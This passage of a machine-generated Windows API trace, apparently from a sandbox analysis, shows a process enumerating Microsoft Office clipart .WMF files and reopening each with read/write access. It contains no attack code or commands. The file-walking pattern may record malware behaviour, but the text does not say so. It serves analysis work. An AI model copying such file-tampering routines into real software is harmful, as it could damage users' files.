(lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.956] GetFileType (hFile=0x27c) returned 0x1 [0100.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0100.956] CloseHandle (hObject=0x27c) returned 1 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.958] AreFileApisANSI () returned 1 [0100.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0100.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 69 [0100.958] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbd2)) returned 1 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0100.958] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.958] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.958] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN00015_.WMF", cAlternateFileName="")) returned 1 [0100.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0100.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0100.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0100.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0100.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.959] AreFileApisANSI () returned 1 [0100.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF", lpUsedDefaultChar=0x0) returned 69 [0100.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0100.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.959] AreFileApisANSI () returned 1 [0100.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0100.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 69 [0100.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.960] GetFileType (hFile=0x27c) returned 0x1 [0100.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0100.960] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.960] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.960] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.960] CloseHandle (hObject=0x27c) returned 1 [0100.960] AreFileApisANSI () returned 1 [0100.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0100.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 69 [0100.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.961] GetFileType (hFile=0x27c) returned 0x1 [0100.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0100.961] CloseHandle (hObject=0x27c) returned 1 [0100.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0100.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0100.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0100.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0100.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0100.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0100.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.962] AreFileApisANSI () returned 1 [0100.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0100.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 69 [0100.962] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x127e)) returned 1 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0100.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.962] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.962] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1634, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN00790_.WMF", cAlternateFileName="")) returned 1 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0100.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0100.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0100.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0100.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0100.963] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.963] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.963] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.963] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0100.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.963] AreFileApisANSI () returned 1 [0100.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF", lpUsedDefaultChar=0x0) returned 69 [0100.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0100.963] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.963] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, 